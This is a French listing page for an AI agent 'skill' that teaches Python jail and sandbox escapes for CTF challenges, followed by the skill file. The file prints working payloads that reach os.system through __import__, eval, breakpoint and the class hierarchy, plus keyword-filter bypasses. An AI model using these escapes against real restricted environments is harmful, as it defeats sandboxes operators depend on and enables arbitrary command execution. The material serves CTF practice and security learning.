Évasion de jail Python

VérifiéPrudence

Échapper aux restrictions des sandbox Python. Utilisez ce skill pour contourner les environnements eval/exec restreints, les filtres de mots-clés ou les défis de jail.

Spar Skills Guide Bot
SecuriteIntermédiaire
1024/07/2026
Claude CodeCursorWindsurf
#python#jail#sandbox-escape#ctf#security

Recommandé pour

Notre avis

Cette compétence permet de contourner les restrictions d'un sandbox Python en utilisant la hiérarchie des classes et des techniques d'obfuscation de code.

Points forts

  • Fournit des techniques concrètes (commandes de base, hiérarchie de classes, contournement par encodage)
  • Inclut une référence rapide et des aides au débogage
  • Couvre les défis courants de jail CTF

Limites

  • Nécessite une connaissance des internes de Python (les indices de hiérarchie de classes peuvent varier)
  • Certaines techniques peuvent échouer face à des sandboxes avancés avec des restrictions supplémentaires
  • Ce n'est pas une solution universelle
Quand l'utiliser

Lorsque vous devez échapper d'un sandbox Python ou exécuter des commandes dans un environnement Python filtré.

Quand l'éviter

Pour le développement Python général ou des tâches non liées à la sécurité.

Analyse de sécurité

Prudence
Score qualité80/100

The skill equips the AI with techniques to break out of restricted Python environments, such as using os.system or class hierarchy exploits. While intended for sanitized environments like CTF challenges, the inclusion of Bash as an allowed tool means these commands could be executed on the host, posing a risk of misuse.

Points d'attention
  • Provides methods for arbitrary code execution via Python sandbox escape, which could be used to run destructive commands if abused.

Exemples

Basic os.system escape
Use Python's os module to execute the command 'cat flag.txt' in a restricted environment.
Class hierarchy escape
Escape the Python sandbox using the class hierarchy method to execute a shell command like 'id'.
Debugging class indices
Find the index of a useful class (e.g., with 'wrap' in its name) for sandbox escape by iterating subclasses.

name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')

Reference Files

| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)
Skills similaires